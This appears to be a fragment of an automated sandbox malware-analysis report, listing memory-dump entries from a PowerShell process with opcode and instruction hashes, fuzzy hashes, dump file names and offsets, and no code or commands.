                                        • Opcode ID: 603744b11fc3d747c20aac10c1fae5217309f97d369eddafb281e74d20923e13
                                        • Instruction ID: 8442bb1c8d0af82b096fedc7bbde1421dd1e94aeb3dbd4b65f67f4d50cfb3163
                                        • Opcode Fuzzy Hash: 603744b11fc3d747c20aac10c1fae5217309f97d369eddafb281e74d20923e13
                                        • Instruction Fuzzy Hash: 79212C75A00619DFCB04DF9DD4809AAFBB1FF8C310B258199D919A7751C731ED51CBA0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec146d69d9ceedfe55e64cf759591f289167ed43977629e2ca01d90f331b798d
                                        • Instruction ID: 5f4427623144c176ce9fb02d4c9df3ce86cf62df87d76f6633ac98697c87018c
                                        • Opcode Fuzzy Hash: ec146d69d9ceedfe55e64cf759591f289167ed43977629e2ca01d90f331b798d
                                        • Instruction Fuzzy Hash: 0921E4B4A005099FCB14CF89C590AAEFBF5FF88310B648569E909A7751C731ED91CBA0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f25c64b4b47108f0c663bf2a0dad74462fdd8c6f0995f54d11b1ca6914db4b03
                                        • Instruction ID: fd55767365ad580f0a938c6c1677ee5c5c68a9037ed12af7a959e89c9d410581
                                        • Opcode Fuzzy Hash: f25c64b4b47108f0c663bf2a0dad74462fdd8c6f0995f54d11b1ca6914db4b03
                                        • Instruction Fuzzy Hash: 84014FB8A006159FCB00DFA8D491AAEF771FF8D310B248199D95A97361CB35EC438B50
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3028020701.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_299d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b96567eab348cee33cf1f985c712c4d73a5bd39347e3688ab78df205b33acf3
                                        • Instruction ID: d2c21ea1813921efa804da2cc6adee492efd391bb3eb606cc8841e7583f1d56d
                                        • Opcode Fuzzy Hash: 2b96567eab348cee33cf1f985c712c4d73a5bd39347e3688ab78df205b33acf3
                                        • Instruction Fuzzy Hash: 3301A2714093449AEB21AA2DCDC4B66BF9CEF42334F18C91AED480B246C7799941CAB1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3028020701.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_299d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 883bb84fad6463fe868d9cd54b677dc9e5f1a8efa8bc924ff1ad76fe3f1263f3
                                        • Instruction ID: cdffeb2741a0c515d9b4af2e9fb5692f12a06eae79cca4680db72a4600e60534
                                        • Opcode Fuzzy Hash: 883bb84fad6463fe868d9cd54b677dc9e5f1a8efa8bc924ff1ad76fe3f1263f3
                                        • Instruction Fuzzy Hash: 78F06272405344AEEB109A19CDC4B66FF9CEB52634F18C55AED484A286C3799845CAB1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3028020701.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_299d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c6c2ded780eb2440ad2f5831d40d50092aaef469e49df9499c7b93295dab63e
                                        • Instruction ID: 754ecf3de0dfba280522ae8a39f34a48d71999cd565a4ed2e9c40d56c00df36f
                                        • Opcode Fuzzy Hash: 7c6c2ded780eb2440ad2f5831d40d50092aaef469e49df9499c7b93295dab63e
                                        • Instruction Fuzzy Hash: 5E2124B26082009FDF05EF1CD9C0B2AFBA9EB94734F24C96DD50A5B245C37AD406C672